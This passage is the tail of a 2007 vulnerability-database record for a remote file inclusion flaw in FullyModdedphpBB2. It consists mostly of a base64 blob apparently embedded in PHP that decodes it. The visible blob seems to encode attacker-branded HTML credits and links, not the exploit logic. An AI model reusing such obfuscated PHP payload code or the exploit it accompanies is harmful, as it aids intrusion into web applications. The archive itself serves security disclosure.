Zm9udCBjb2xvcj0iI0ZGMDAwMCI+RDwvZm9udD\r\n 48Zm9udCBjb2xvcj0id2hpdGUiPgo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5NPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZTwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+bWI8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5lcjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UzwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPjsKPC9mb250Pgo8L2I+Cjxicj48YnI+CjxhIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmUiIGhyZWY9Im1haWx0bzpzZWN1cml0eUBzb3Fvci5uZXQiPgo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+ZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+QzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+dTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+aTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+eTwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+W0FUXTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+UzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+bzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+UTw\r\n vZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+bzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+UjwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+W0RvVF08L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPk48L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPlQ8L2ZvbnQ+PC9hPgo8YnI+CjxhIGhyZWY9Imh0dHA6Ly93d3cuc29xb3IubmV0IiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlc8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPnc8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlc8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPltEb1RdPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5TPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5vPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5RPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIiBmYWNl\r\n PSJWZXJkYW5hIiBzaXplPSIyIj5vPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5SPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5bRG9UXTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+TjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+ZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+VDwvZm9udD48L2E+CjwvZGl2Pgo8L2JvZHk+"));\r\n?>", "modified": "2007-04-20T00:00:00", "published": "2007-04-20T00:00:00", "id": "SECURITYVULNS:DOC:16800", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16800", "title": "FullyModdedphpBB2 Remote File Inclusion", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
